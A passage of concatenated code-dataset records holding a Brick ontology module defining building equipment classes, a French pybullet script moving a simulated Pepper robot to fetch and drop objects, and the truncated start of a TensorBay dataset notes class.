[TAG.Electrical, TAG.Meter, TAG.Equipment],\n \"subclasses\": {\n \"Building_Electrical_Meter\": {\n \"tags\": [\n TAG.Building,\n TAG.Electrical,\n TAG.Meter,\n TAG.Equipment,\n ],\n \"parents\": [BRICK.Building_Meter],\n }\n },\n },\n \"Gas_Meter\": {\n \"tags\": [TAG.Meter, TAG.Equipment, TAG.Gas],\n \"subclasses\": {\n \"Building_Gas_Meter\": {\n \"tags\": [TAG.Building, TAG.Gas, TAG.Meter, TAG.Equipment],\n \"parents\": [BRICK.Building_Meter],\n }\n },\n },\n \"Water_Meter\": {\n \"tags\": [TAG.Meter, TAG.Equipment, TAG.Water],\n \"parents\": [BRICK.Water_System],\n \"subclasses\": {\n \"Building_Water_Meter\": {\n \"tags\": [TAG.Building, TAG.Water, TAG.Meter, TAG.Equipment],\n \"parents\": [BRICK.Building_Meter],\n },\n \"Chilled_Water_Meter\": {\n \"tags\": [TAG.Meter, TAG.Equipment, TAG.Water, TAG.Chilled],\n \"parents\": [BRICK.Chilled_Water_System],\n \"subclasses\": {\n \"Building_Chilled_Water_Meter\": {\n \"tags\": [\n TAG.Building,\n TAG.Chilled,\n TAG.Water,\n TAG.Meter,\n TAG.Equipment,\n ],\n \"parents\": [BRICK.Building_Meter],\n },\n },\n },\n \"Hot_Water_Meter\": {\n \"tags\": [TAG.Meter, TAG.Equipment, TAG.Water, TAG.Hot],\n \"parents\": [BRICK.Chilled_Water_System],\n \"subclasses\": {\n \"Building_Hot_Water_Meter\": {\n \"tags\": [\n TAG.Building,\n TAG.Hot,\n TAG.Water,\n TAG.Meter,\n TAG.Equipment,\n ],\n \"parents\": [BRICK.Building_Meter],\n },\n },\n },\n },\n },\n \"Building_Meter\": {\"tags\": [TAG.Meter, TAG.Equipment, TAG.Building]},\n },\n },\n \"Water_System\": {\n \"tags\": [TAG.Water, TAG.Equipment],\n \"subclasses\": {\n \"Chilled_Water_System\": {\n OWL.equivalentClass: BRICK[\"CWS\"],\n \"tags\": [TAG.Water, TAG.Chilled, TAG.Equipment],\n },\n \"Hot_Water_System\": {\n OWL.equivalentClass: BRICK[\"HWS\"],\n \"tags\": [TAG.Water, TAG.Hot, TAG.Equipment],\n \"subclasses\": {\n \"Domestic_Hot_Water_System\": {\n \"tags\": [TAG.Domestic, TAG.Water, TAG.Hot, TAG.Equipment],\n },\n },\n },\n \"CWS\": {\n OWL.equivalentClass: BRICK[\"Chilled_Water_System\"],\n \"tags\": [TAG.CWS],\n },\n \"HWS\": {OWL.equivalentClass: BRICK[\"Hot_Water_System\"], \"tags\": [TAG.HWS]},\n },\n },\n \"Steam_System\": {\"tags\": [TAG.Steam, TAG.Equipment]},\n \"Solar_Panel\": {\"tags\": [TAG.Solar, TAG.Equipment]},\n \"Shading_System\": {\n \"tags\": [TAG.Shade, TAG.Equipment],\n \"subclasses\": {\"Louver\": {\"tags\": [TAG.Shade, TAG.Equipment, TAG.Louver]}},\n },\n \"Lighting_System\": {\n \"tags\": [TAG.Lighting, TAG.Equipment],\n \"subclasses\": {\n \"Lighting\": {\n \"subclasses\": {\n \"Luminaire\": {\"tags\": [TAG.Luminaire, TAG.Equipment]},\n \"Luminaire_Driver\": {\n \"tags\": [TAG.Luminaire, TAG.Driver, TAG.Equipment],\n },\n },\n },\n \"Interface\": {\n \"tags\": [TAG.Equipment, TAG.Interface],\n \"subclasses\": {\n \"Switch\": {\n \"tags\": [TAG.Equipment, TAG.Interface, TAG.Switch],\n \"subclasses\": {\n \"Dimmer\": {\n \"tags\": [\n TAG.Equipment,\n TAG.Interface,\n TAG.Switch,\n TAG.Dimmer,\n ],\n },\n },\n },\n \"Touchpanel\": {\n \"tags\": [TAG.Equipment, TAG.Interface, TAG.Touchpanel],\n },\n },\n },\n },\n },\n \"Furniture\": {\"tags\": [TAG.Equipment, TAG.Furniture]},\n \"Fire_Safety_System\": {\n \"tags\": [TAG.Equipment, TAG.Fire, TAG.Safety, TAG.System],\n \"subclasses\": {\n \"Fire_Control_Panel\": {\n \"tags\": [TAG.Equipment, TAG.Fire, TAG.Safety, TAG.Panel],\n OWL.equivalentClass: BRICK[\"FCP\"],\n },\n \"FCP\": {\"tags\": [TAG.FCP, TAG.Equipment]},\n },\n },\n \"Elevator\": {\"tags\": [TAG.Elevator, TAG.Equipment]},\n \"Security_Equipment\": {\"tags\": [TAG.Security, TAG.Equipment]},\n \"Safety_Equipment\": {\"tags\": [TAG.Safety, TAG.Equipment]},\n \"Camera\": {\"tags\": [TAG.Camera, TAG.Equipment]},\n}\n\n\n\"\"\"\nDefine classes of HVAC equipment\n\"\"\"\nhvac_subclasses = {\n \"Variable_Frequency_Drive\": {\n \"tags\": [TAG.Equipment, TAG.Variable, TAG.Frequency, TAG.Drive],\n OWL.equivalentClass: BRICK[\"VFD\"],\n SKOS.definition: Literal(\n \"Electronic device that varies its output frequency to vary the rotating speed of a motor, given a fixed input frequency. Used with fans or pumps to vary the flow in the system as a function of a maintained pressure.\"\n ),\n },\n \"Valve\": {\n \"tags\": [TAG.Valve, TAG.Equipment]\n # subclasses defined in 'valve_subclasses'\n },\n \"VFD\": {\n \"tags\": [TAG.Equipment, TAG.VFD],\n \"subclasses\": {\n \"Heat_Wheel_VFD\": {\"tags\": [TAG.Equipment, TAG.Heat, TAG.Wheel, TAG.VFD]},\n },\n },\n \"Thermostat\": {\n \"tags\": [TAG.Equipment, TAG.Thermostat],\n SKOS.definition: Literal(\n \"An automatic control device used to maintain temperature at a fixed or adjustable setpoint.\"\n ),\n },\n \"Terminal_Unit\": {\n \"tags\": [TAG.Equipment, TAG.Terminal, TAG.Unit],\n SKOS.definition: Literal(\n \"A device that regulates the volumetric flow rate and/or the temperature of the controlled medium.\"\n ),\n \"subclasses\": {\n \"Fan_Coil_Unit\": {\n \"tags\": [TAG.Equipment, TAG.Fan, TAG.Coil, TAG.Unit],\n OWL.equivalentClass: BRICK[\"FCU\"],\n },\n \"FCU\": {\"tags\": [TAG.FCU]},\n \"Variable_Air_Volume_Box\": {\n \"tags\": [TAG.Equipment, TAG.Variable, TAG.Volume, TAG.Box],\n OWL.equivalentClass: BRICK[\"VAV\"],\n \"subclasses\": {\n \"Variable_Air_Volume_Box_With_Reheat\": {\n \"tags\": [\n TAG.Equipment,\n TAG.Variable,\n TAG.Volume,\n TAG.Box,\n TAG.Reheat,\n ],\n OWL.equivalentClass: BRICK[\"RVAV\"],\n },\n \"RVAV\": {\"tags\": [TAG.Equipment, TAG.RVAV]},\n },\n },\n \"VAV\": {\"tags\": [TAG.Equipment, TAG.VAV]},\n },\n },\n \"Space_Heater\": {\n \"tags\": [TAG.Equipment, TAG.Space, TAG.Heater],\n SKOS.definition: Literal(\n \"A heater used to warm the air in an enclosed area, such as a room or office\"\n ),\n },\n \"Pump\": {\n \"tags\": [TAG.Equipment, TAG.Pump],\n SKOS.definition: Literal(\n \"Machine for imparting energy to a fluid, causing it to do work, drawing a fluid into itself through an entrance port, and forcing the fluid out through an exhaust port.\"\n ),\n \"subclasses\": {\n \"Water_Pump\": {\n \"tags\": [TAG.Equipment, TAG.Pump, TAG.Water],\n \"subclasses\": {\n \"Chilled_Water_Pump\": {\n \"tags\": [TAG.Equipment, TAG.Pump, TAG.Chilled, TAG.Water],\n },\n \"Condenser_Water_Pump\": {\n \"tags\": [TAG.Equipment, TAG.Pump, TAG.Condenser, TAG.Water],\n },\n \"Hot_Water_Pump\": {\n \"tags\": [TAG.Equipment, TAG.Pump, TAG.Hot, TAG.Water],\n },\n },\n },\n },\n },\n \"Heat_Exchanger\": {\n \"tags\": [TAG.Equipment, TAG.Heat, TAG.Exchanger],\n OWL.equivalentClass: BRICK[\"HX\"],\n \"subclasses\": {\n \"Evaporative_Heat_Exchanger\": {\n \"tags\": [TAG.Evaporative, TAG.Equipment, TAG.Heat, TAG.Exchanger],\n },\n \"Condenser_Heat_Exchanger\": {\n \"tags\": [TAG.Condenser, TAG.Equipment, TAG.Heat, TAG.Exchanger],\n },\n \"Heat_Wheel\": {\n \"tags\": [TAG.Equipment, TAG.Heat, TAG.Wheel],\n SKOS.definition: Literal(\n \"A type of energy recovery heat exchanger positioned within the supply and exhaust air streams of an air-handling system or in the exhaust gases of an industrial process, in order to recover the heat energy\"\n ),\n RDFS.seeAlso: Literal(\"https://en.wikipedia.org/wiki/Thermal_wheel\"),\n },\n },\n },\n \"HX\": {\"tags\": [TAG.Equipment, TAG.HX]},\n \"Fume_Hood\": {\n \"tags\": [TAG.Equipment, TAG.Fume, TAG.Hood],\n SKOS.definition: Literal(\n \"A fume-collection device mounted over a work space, table, or shelf and serving to conduct unwanted gases away from the area enclosed.\"\n ),\n },\n \"Filter\": {\n \"tags\": [TAG.Equipment, TAG.Filter],\n SKOS.definition: Literal(\"Device to remove gases from a mixture of gases\"),\n \"subclasses\": {\n \"Mixed_Air_Filter\": {\n \"tags\": [TAG.Equipment, TAG.Mixed, TAG.Air, TAG.Filter],\n },\n },\n },\n \"Fan\": {\n SKOS.definition: Literal(\n \"Any device with two or more blades or vanes attached to a rotating shaft used to produce an airflow for the purpose of comfort, ventilation, exhaust, heating, cooling, or any other gaseous transport.\"\n ),\n \"tags\": [TAG.Equipment, TAG.Fan],\n \"subclasses\": {\n \"Cooling_Tower_Fan\": {\n \"tags\": [TAG.Cool, TAG.Tower, TAG.Equipment, TAG.Fan],\n },\n \"Exhaust_Fan\": {\"tags\": [TAG.Equipment, TAG.Fan, TAG.Exhaust]},\n \"Return_Fan\": {\"tags\": [TAG.Equipment, TAG.Fan, TAG.Return]},\n \"Standby_Fan\": {\"tags\": [TAG.Equipment, TAG.Fan, TAG.Standby]},\n \"Discharge_Fan\": {\"tags\": [TAG.Equipment, TAG.Fan, TAG.Discharge]},\n \"Supply_Fan\": {\n \"tags\": [TAG.Equipment, TAG.Fan, TAG.Supply],\n \"subclasses\": {\n \"Booster_Fan\": {\"tags\": [TAG.Equipment, TAG.Fan, TAG.Booster]},\n },\n },\n },\n },\n \"Economizer\": {\n \"tags\": [TAG.Equipment, TAG.Economizer],\n SKOS.definition: Literal(\n \"Device that, on proper variable sensing, initiates control signals or actions to conserve energy. A control system that reduces the mechanical heating and cooling requirement.\"\n ),\n },\n \"Damper\": {\n SKOS.definition: Literal(\n \"Element inserted into an air-distribution system or element of an air-distribution system permitting modification of the air resistance of the system and consequently changing the airflow rate or shutting off the airflow.\"\n ),\n \"tags\": [TAG.Equipment, TAG.Damper],\n \"subclasses\": {\n \"Economizer_Damper\": {\"tags\": [TAG.Equipment, TAG.Damper, TAG.Economizer]},\n \"Exhaust_Damper\": {\"tags\": [TAG.Equipment, TAG.Damper, TAG.Exhaust]},\n \"Outside_Damper\": {\"tags\": [TAG.Equipment, TAG.Damper, TAG.Outside]},\n \"Return_Damper\": {\"tags\": [TAG.Equipment, TAG.Damper, TAG.Return]},\n },\n },\n \"Condenser\": {\n \"tags\": [TAG.Equipment, TAG.Condenser],\n SKOS.definition: Literal(\n \"A heat exchanger in which the primary heat transfer vapor changes its state to a liquid phase.\"\n ),\n },\n \"Computer_Room_Air_Conditioning\": {\n \"tags\": [TAG.Equipment, TAG.Computer, TAG.Room, TAG.Air, TAG.Conditioning],\n SKOS.definition: Literal(\n \"A device that monitors and maintains the temperature, air distribution and humidity in a network room or data center. \"\n ),\n OWL.equivalentClass: BRICK[\"CRAC\"],\n },\n \"CRAC\": {\n \"tags\": [TAG.Equipment, TAG.CRAC],\n OWL.equivalentClass: BRICK[\"Computer_Room_Air_Conditioning\"],\n \"subclasses\": {\n \"Standby_CRAC\": {\"tags\": [TAG.Equipment, TAG.CRAC, TAG.Standby]},\n },\n },\n \"Compressor\": {\n \"tags\": [TAG.Equipment, TAG.Compressor],\n SKOS.definition: Literal(\n \"(1) device for mechanically increasing the pressure of a gas. (2) often described as being either open, hermetic, or semihermetic to describe how the compressor and motor drive is situated in relation to the gas or vapor being compressed. Types include centrifugal, axial flow, reciprocating, rotary screw, rotary vane, scroll, or diaphragm. 1. device for mechanically increasing the pressure of a gas. 2. specific machine, with or without accessories, for compressing refrigerant vapor.\"\n ),\n },\n \"Coil\": {\n SKOS.definition: Literal(\n \"Exchanger that transfers heat from an exhaust airstream to a separated supply airstream.\"\n ),\n \"tags\": [TAG.Equipment, TAG.Coil],\n \"subclasses\": {\n \"Cooling_Coil\": {\"tags\": [TAG.Equipment, TAG.Coil, TAG.Cool]},\n \"Heating_Coil\": {\"tags\": [TAG.Equipment, TAG.Coil, TAG.Heat]},\n },\n },\n \"Chiller\": {\n \"tags\": [TAG.Equipment, TAG.Chiller],\n \"subclasses\": {\n \"Absorption_Chiller\": {\n \"tags\": [TAG.Equipment, TAG.Chiller, TAG.Absorption],\n },\n \"Centrifugal_Chiller\": {\n \"tags\": [TAG.Equipment, TAG.Chiller, TAG.Centrifugal],\n },\n },\n },\n \"Humidifier\": {\"tags\": [TAG.Equipment, TAG.Humidifier]},\n \"Boiler\": {\n \"tags\": [TAG.Equipment, TAG.Boiler],\n SKOS.definition: Literal(\n \"A closed, pressure vessel that uses fuel or electricity for heating water or other fluids to supply steam or hot water for heating, humidification, or other applications.\"\n ),\n },\n \"Air_Handler_Unit\": {\n \"tags\": [TAG.Equipment, TAG.Air, TAG.Handler, TAG.Unit],\n SKOS.definition: Literal(\n \"Assembly consisting of sections containing a fan or fans and other necessary equipment to perform one or more of the following functions: circulating, filtration, heating, cooling, heat recovery, humidifying, dehumidifying, and mixing of air. Is usually connected to an air-distribution system.\"\n ),\n OWL.equivalentClass: BRICK[\"AHU\"],\n },\n \"AHU\": {\n \"tags\": [TAG.Equipment, TAG.AHU],\n \"subclasses\": {\n \"Rooftop_Unit\": {\n OWL.equivalentClass: BRICK[\"RTU\"],\n \"tags\": [TAG.Equipment, TAG.Rooftop, TAG.AHU],\n },\n \"RTU\": {\n \"tags\": [TAG.Equipment, TAG.RTU],\n OWL.equivalentClass: BRICK[\"Rooftop_Unit\"],\n },\n },\n },\n}\n\n\"\"\"\nValve subclasses\n\"\"\"\nvalve_subclasses = {\n \"Heating_Valve\": {\n \"tags\": [TAG.Valve, TAG.Heat, TAG.Equipment],\n \"subclasses\": {\n \"Reheat_Valve\": {\"tags\": [TAG.Valve, TAG.Reheat, TAG.Heat, TAG.Equipment]},\n \"Return_Heating_Valve\": {\n \"tags\": [TAG.Valve, TAG.Return, TAG.Heat, TAG.Equipment],\n SKOS.definition: Literal(\n \"A valve installed on the return side of a heat exchanger\"\n ),\n },\n \"Domestic_Hot_Water_Valve\": {\n \"tags\": [\n TAG.Domestic,\n TAG.Water,\n TAG.Hot,\n TAG.Valve,\n TAG.Heat,\n TAG.Equipment,\n ],\n \"parents\": [BRICK.Domestic_Hot_Water_System, BRICK.Water_Valve],\n },\n \"Preheat_Hot_Water_Valve\": {\n \"tags\": [\n TAG.Preheat,\n TAG.Water,\n TAG.Hot,\n TAG.Valve,\n TAG.Heat,\n TAG.Equipment,\n ],\n \"parents\": [BRICK.Hot_Water_System, BRICK.Water_Valve],\n },\n },\n },\n \"Cooling_Valve\": {\"tags\": [TAG.Valve, TAG.Cool, TAG.Equipment]},\n \"Water_Valve\": {\n \"tags\": [TAG.Valve, TAG.Water, TAG.Equipment],\n \"subclasses\": {\n \"Chilled_Water_Valve\": {\n \"tags\": [TAG.Chilled, TAG.Valve, TAG.Water, TAG.Equipment],\n \"parents\": [BRICK.Chilled_Water_System],\n },\n },\n },\n \"Isolation_Valve\": {\"tags\": [TAG.Isolation, TAG.Valve, TAG.Equipment]},\n}\n\nsecurity_subclasses = {\n \"Access_Control_Equipment\": {\n \"tags\": [TAG.Equipment, TAG.Security, TAG.Access, TAG.Control],\n \"subclasses\": {\n \"Access_Reader\": {\n \"tags\": [\n TAG.Equipment,\n TAG.Security,\n TAG.Access,\n TAG.Reader,\n TAG.Control,\n ],\n SKOS.definition: Literal(\n \"Used in physical security systems to read a credential that allows access through access points. \"\n \"Usually card badge credentials for locked doors or monitored checkpoints.\"\n ),\n },\n },\n # TODO subclasses\n # Access (Control) Panel: The controller panel will typically have electrical connections for the selected credential reader,\n # a relay output to control the door release, door position input, programmable inputs and outputs, and inputs for the REX.\n # Accsss Control Sub Panel (Alarm Panel)?\n # Panel_Input: Input into the access panel: switch toggle, button press, credential entered/scanned/swiped, etc\n # Panel_Output: Ouput from the access panel: some sort of function is activated, door area is unlocked, etc\n # Reader_Aux_Input: The input from the reader on the “other” side of the controlled door\n # Reader_Aux_Output: The output from the reader on the “other” side of the controlled door\n # Biometric Reader: Reader of biometric characteristics to be used for authentication\n # REX: Request to exit. a required accessory in an access control system, which can take the form of anything from a\n # mushroom button to an infrared sensor. In an access control system, the REX (Request to exit) trips a relay in the panel\n # to bypass “door forced” alarms within the access control software to avoid false alarms in the audit report. It can also be\n # used to trip a relay which changes the state of an electric electronic item from on to off, lock to unlock or open to close.\n # Magnetic_Lock: Electromagnetic or magnetic lock, a locking mechanisim that consists of an electromagnet and an armature plate.\n # Electrified_Lock: An electronic lock, a locking device that works by means of electric current. Can be controlled remotely\n # depending on the locking system.\n # Door_Release: An electronic input device used to immediately unlock specififed doors that are equipped with electronic locks.\n # Badge Station: A kiosk or checkpoint that requires the use of a badge in order to verify credentials and to grant access.\n },\n \"Video_Surveillance_Equipment\": {\n \"tags\": [TAG.Equipment, TAG.Security, TAG.Video, TAG.Surveillance],\n \"subclasses\": {\n \"Surveillance_Camera\": {\n \"tags\": [\n TAG.Equipment,\n TAG.Security,\n TAG.Video,\n TAG.Surveillance,\n TAG.Camera,\n ],\n SKOS.definition: Literal(\n \"An optical instrument to capture still images or record moving images, which are stored on a physical or digital medium.\"\n ),\n \"parents\": [BRICK.Camera]\n # TODO: subclass of PTZ (Pan/Tilt/Zoom) cameras?\n },\n \"NVR\": {\n \"tags\": [\n TAG.Equipment,\n TAG.Security,\n TAG.Video,\n TAG.Surveillance,\n TAG.NVR,\n ],\n OWL.equivalentClass: BRICK[\"Network_Video_Recorder\"],\n SKOS.definition: Literal(\"A Network Video Recorder.\"),\n },\n \"Network_Video_Recorder\": {\n \"tags\": [\n TAG.NVR,\n TAG.Equipment,\n TAG.Security,\n TAG.Video,\n TAG.Recorder,\n TAG.Network,\n ],\n OWL.equivalentClass: BRICK[\"NVR\"],\n SKOS.definition: Literal(\"A Network Video Recorder.\"),\n },\n },\n # TODO\n # Encoder: (Do we imply video encoder here?) - A device that is used to convert information from one format to another.\n # Switch: Again this sounds generic - A device that can connect, disconnect, or divert current in an electrical current (or signal)\n # - is any specific kind of switch e.g. PoESwitch implied here?\n # Video_Wall (or should this be in a separate classification with displays and monitors?)\n },\n \"Intrusion_Detection_Equipment\": {\n \"tags\": [TAG.Equipment, TAG.Security, TAG.Intrusion, TAG.Detection],\n # TODO\n # Motion sensor - but maybe to Points, but still need a way to represent security motion sensors\n # Security Control Panel: The central hub of a security system. All devices are connected to the security panel for easy\n # and efficient access for different security protocols (i.e. Intrusion security) and events. Question: How’s this different from\n # Access Panel? Is this specific to Intrusion detection system or more general?\n # Glass_Break_Sensor: a sensor used in electronic alarms that detect if pane of glass has been shattered or is broken.\n # Duress_Button: Panic button, an electronic input device used to help alerting someone in emergency situations.\n # Door_Contacts: Door contact sensor, a peripheral security sensor that lets an alarm system know whether a door is\n # open or closed.\n },\n \"Intercom_Equipment\": {\n \"tags\": [TAG.Equipment, TAG.Security, TAG.Intercom],\n \"subclasses\": {\n \"Emergency_Phone\": {\n \"tags\": [\n TAG.Equipment,\n TAG.Security,\n TAG.Intercom,\n TAG.Emergency,\n TAG.Phone,\n ],\n SKOS.definition: Literal(\n \"A phone specifically provided for making calls to emergency services.\"\n ),\n },\n \"Video_Intercom\": {\n \"tags\": [TAG.Equipment, TAG.Security, TAG.Intercom, TAG.Video],\n SKOS.definition: Literal(\n \"An intercom device that has video capabilites as well as voice capabilities\"\n ),\n },\n },\n },\n}\n\nsafety_subclasses = {\n \"Automated_External_Defibrillator\": {\n OWL.equivalentClass: BRICK[\"AED\"],\n \"tags\": [TAG.Equipment, TAG.Safety, TAG.AED, TAG.Defibrillator],\n SKOS.definition: Literal(\n \"Automated External Defibrillator. Used by trained people to help those experiencing cardiac issues.\"\n ),\n },\n \"AED\": {\n OWL.equivalentClass: BRICK[\"Automated_External_Defibrillator\"],\n \"tags\": [TAG.Equipment, TAG.Safety, TAG.AED, TAG.Defibrillator],\n SKOS.definition: Literal(\n \"Automated External Defibrillator. Used by trained people to help those experiencing cardiac issues.\"\n ),\n },\n \"First_Aid_Kit\": {\n \"tags\": [TAG.Equipment, TAG.Safety, TAG.Aid, TAG.FirstAid],\n SKOS.definition: Literal(\n \"A collection of medical supplies placed in a well-known location to provide immediate treatment\"\n ),\n },\n \"Emergency_Wash_Station\": {\n \"tags\": [TAG.Equipment, TAG.Safety, TAG.Wash, TAG.Station, TAG.Emergency],\n SKOS.definition: Literal(\n \"A piece of plumbed equipment to flush chemicals or hazardous substances off of a person\"\n ),\n \"subclasses\": {\n \"Eye_Wash_Station\": {\n \"tags\": [\n TAG.Equipment,\n TAG.Safety,\n TAG.Wash,\n TAG.Station,\n TAG.Emergency,\n TAG.Eye,\n ],\n SKOS.definition: Literal(\n \"An emergency wash station to flush chemicals or hazardous substances out of a persons eye\"\n ),\n },\n \"Safety_Shower\": {\n \"tags\": [\n TAG.Equipment,\n TAG.Safety,\n TAG.Wash,\n TAG.Station,\n TAG.Emergency,\n TAG.Shower,\n ],\n SKOS.definition: Literal(\n \"An emergency wash station to flush chemicals or hazardous substances off of a person\"\n ),\n },\n \"Drench_Hose\": {\n \"tags\": [\n TAG.Equipment,\n TAG.Safety,\n TAG.Wash,\n TAG.Station,\n TAG.Emergency,\n TAG.Drench,\n TAG.Hose,\n ],\n SKOS.definition: Literal(\n \"An emergency wash station to flush chemicals or hazardous substances off of a person by spraying water on them from a distance\"\n ),\n },\n },\n },\n}\n","sub_path":"bricksrc/equipment.py","file_name":"equipment.py","file_ext":"py","file_size_in_byte":28680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"593059436","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 5 10:04:31 2019\n\n@author: nicolas\n\"\"\"\n\nimport random\nimport pybullet\nimport pybullet_data\nimport cv2\nimport time\nfrom qibullet import SimulationManager\nfrom qibullet import PepperVirtual\n\nliste_choix = [\"cat\",\"turtle\",\"parrot\"]\nchoix = liste_choix[1]\n\n#-----------------------------Initialisation-----------------------------------\ndef main(): \n \"Initialisation des variables\"\n simulation_manager = SimulationManager() \n client = simulation_manager.launchSimulation(gui=True)\n pepper = simulation_manager.spawnPepper(client, spawn_ground_plane=True)\n pybullet.setAdditionalSearchPath(pybullet_data.getDataPath())\n \n \n \"Appel des fonctions\"\n Environnement(client)\n pepper.goToPosture(\"Stand\", 0.6)\n time.sleep(1)\n Catch_Objet_Milieu(pepper)\n \"\"\"for i in range(2): \n Prise_Photo(pepper)\"\"\"\n Retour_Depart_Milieu(pepper)\n Lacher_Objet(pepper,choix)\n \n while True:\n cv2.waitKey(1)\n \n \n#----------------------------FONCTION LOAD OBJET------------------------------- \n\"Ici on charge tous les objets de l'environnement dans lequel le robot va évoluer\"\ndef Environnement(client): \n \n coord_y = [-0.8,0.0,0.8]\n liste_coord_y = random.sample(coord_y,3)\n \n pybullet.loadURDF(\n \"table2.urdf\",\n basePosition=[2.3, 0, 0.3],\n globalScaling=17,\n physicsClientId=client)\n \n pybullet.loadURDF(\n \"totem_Tortue.urdf\",\n basePosition=[1.95, -0.8, 0.7],\n globalScaling=1.5,\n physicsClientId=client)\n \n pybullet.loadURDF(\n \"totem_Parrot.urdf\",\n basePosition=[1.95, 0.8, 0.7],\n globalScaling=1.5,\n physicsClientId=client)\n \n pybullet.loadURDF(\n \"totem_Cat.urdf\",\n basePosition=[1.95, 0, 0.7],\n globalScaling=1.5,\n physicsClientId=client)\n\n pybullet.loadURDF(\n \"caisse.urdf\",\n basePosition=[0.0, 2.5, 0.01],\n globalScaling=0.2,\n physicsClientId=client)\n\n pybullet.loadURDF(\n \"caisse.urdf\",\n basePosition=[-0.1, -2.5, 0.1],\n globalScaling=0.2,\n physicsClientId=client)\n\n pybullet.loadURDF(\n \"caisse.urdf\",\n basePosition=[-1.8,-0.05, 0.1],\n globalScaling=0.2,\n physicsClientId=client)\n\n\n#----------------------------FONCTION_Prise_Photos-----------------------------\n\"Ici on donne les instructions de mouvement pour que le robot prenne tous les animaux en photo\"\n\n \ndef Retour_Depart_Milieu(pepper):\n #pepper.moveTo(0,-0.8,0) \n #time.sleep(1)\n pepper.moveTo(-0.9,0,0)\n time.sleep(1)\n \ndef Catch_Objet_Milieu(pepper):\n pepper.moveTo(1.06,0,0) \n pepper.setAngles(\"RElbowRoll\", 0.0, 1.0) \n pepper.setAngles(\"RShoulderPitch\", 0.15, 1.0) \n pepper.setAngles(\"RHand\", 1.5, 1.0) \n pepper.moveTo(0.55,0,0)\n pepper.moveTo(0,0.187,0)\n pepper.setAngles(\"RHand\", 0.00, 1.0) \n time.sleep(4)\n pepper.moveTo(-0.73,0,0)\n time.sleep(4)\n pepper.moveTo(0,-0.187,0)\n time.sleep(1)\n \ndef Prise_Photo(pepper):\n pepper.setAngles(\"HeadPitch\",-1.0, 1.0) #le robot lève la tête pour avoir le bon angle\n pepper.subscribeCamera(PepperVirtual.ID_CAMERA_BOTTOM)\n img = pepper.getCameraFrame() #prise de photo\n cv2.imshow(\"bottom camera\", img) #affichage de la photo\n time.sleep(5)\n pepper.moveTo(0,0.8,0)\n time.sleep(1) \n \ndef Lacher_Objet(pepper, choix):\n if choix == \"cat\":\n pepper.moveTo(-0.9,0,0)\n time.sleep(1)\n pepper.moveTo(0,0,3.14)\n time.sleep(1)\n pepper.setAngles(\"RElbowRoll\", -0.3, 1.0) \n time.sleep(1)\n pepper.setAngles(\"RHand\", 1.5, 1.0) \n time.sleep(1)\n elif choix == \"parrot\":\n pepper.moveTo(0,-1.80,0)\n time.sleep(1)\n pepper.moveTo(0,0,-1.57)\n time.sleep(1)\n pepper.setAngles(\"RHand\", 1.5, 1.0) \n time.sleep(1)\n elif choix == \"turtle\":\n pepper.moveTo(0,1.80,0)\n time.sleep(1)\n pepper.moveTo(0,0,1.57)\n time.sleep(1)\n time.sleep(1)\n pepper.setAngles(\"RHand\", 1.5, 1.0) \n time.sleep(1)\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Script_Projet_Nico/Pepper_Basic_Nico.py","file_name":"Pepper_Basic_Nico.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"68188442","text":"#!/usr/bin/env python3\n#\n# Copyright 2021 Graviti. Licensed under MIT License.\n#\n\n\"\"\"Notes, DatasetBase, Dataset and FusionDataset.\n\n:class:`Notes` contains the basic information of a :class:`DatasetBase`.\n\n:class:`DatasetBase` defines the basic concept of a dataset,\nwhich is the top-level structure to handle your data files, labels and other additional information.\n\nIt represents a whole dataset contains several segments\nand is the base class of :class:`Dataset` and :class:`FusionDataset`.\n\n:class:`Dataset` is made up of data collected from only one sensor\nor data without sensor information.\nIt consists of a list of :class:`~tensorbay.dataset.segment.Segment`.\n\n:class:`FusionDataset` is made up of data collected from multiple sensors.\nIt consists of a list of :class:`~tensorbay.dataset.segment.FusionSegment`.\n\n\"\"\"\n\nimport json\nfrom typing import (\n TYPE_CHECKING,\n Any,\n Dict,\n Iterable,\n KeysView,\n Optional,\n Sequence,\n Tuple,\n Type,\n TypeVar,\n Union,\n overload,\n)\n\nfrom ..label import Catalog\nfrom ..utility import (\n Deprecated,\n EqMixin,\n NameMixin,\n NameSortedList,\n ReprMixin,\n ReprType,\n common_loads,\n locked,\n)\nfrom .segment import FusionSegment, Segment\n\nif TYPE_CHECKING:\n from ..client import GAS\n\n_T = TypeVar(\"_T\", FusionSegment, Segment)\n\n\nclass Notes(ReprMixin, EqMixin):\n \"\"\"This is a class stores the basic information of :class:`DatasetBase`.\n\n Arguments:\n is_continuous: Whether the data inside the dataset is time-continuous.\n bin_point_cloud_fields: The field names of the bin point cloud files in the dataset.\n\n \"\"\"\n\n _T = TypeVar(\"_T\", bound=\"Notes\")\n\n _repr_attrs = (\"is_continuous\", \"bin_point_cloud_fields\")\n\n def __init__(\n self, is_continuous: bool = False, bin_point_cloud_fields: Optional[Iterable[str]] = None\n ) -> None:\n self.is_continuous = is_continuous\n self.bin_point_cloud_fields = bin_point_cloud_fields\n\n def __getitem__(self, key: str) -> Any:\n try:\n return getattr(self, key)\n except AttributeError as error:\n raise KeyError(key) from error\n\n def _loads(self, contents: Dict[str, Any]) -> None:\n self.is_continuous = contents[\"isContinuous\"]\n self.bin_point_cloud_fields = contents.get(\"binPointCloudFields\")\n\n @classmethod\n def loads(cls: Type[_T], contents: Dict[str, Any]) -> _T:\n \"\"\"Loads a :class:`Notes` instance from the given contents.\n\n Arguments:\n contents: The given dict containing the dataset notes::\n\n {\n \"isContinuous\": \n \"binPointCloudFields\": [ or null\n , \n ...\n ]\n }\n\n Returns:\n The loaded :class:`Notes` instance.\n\n \"\"\"\n return common_loads(cls, contents)\n\n def keys(self) -> KeysView[str]:\n \"\"\"Return the valid keys within the notes.\n\n Returns:\n The valid keys within the notes.\n\n \"\"\"\n return KeysView(self._repr_attrs) # type: ignore[arg-type]\n\n def dumps(self) -> Dict[str, Any]:\n \"\"\"Dumps the notes into a dict.\n\n Returns:\n A dict containing all the information of the Notes::\n\n {\n \"isContinuous\": \n \"binPointCloudFields\": [ or null\n , \n ...\n ]\n }\n\n \"\"\"\n contents: Dict[str, Any] = {\"isContinuous\": self.is_continuous}\n if 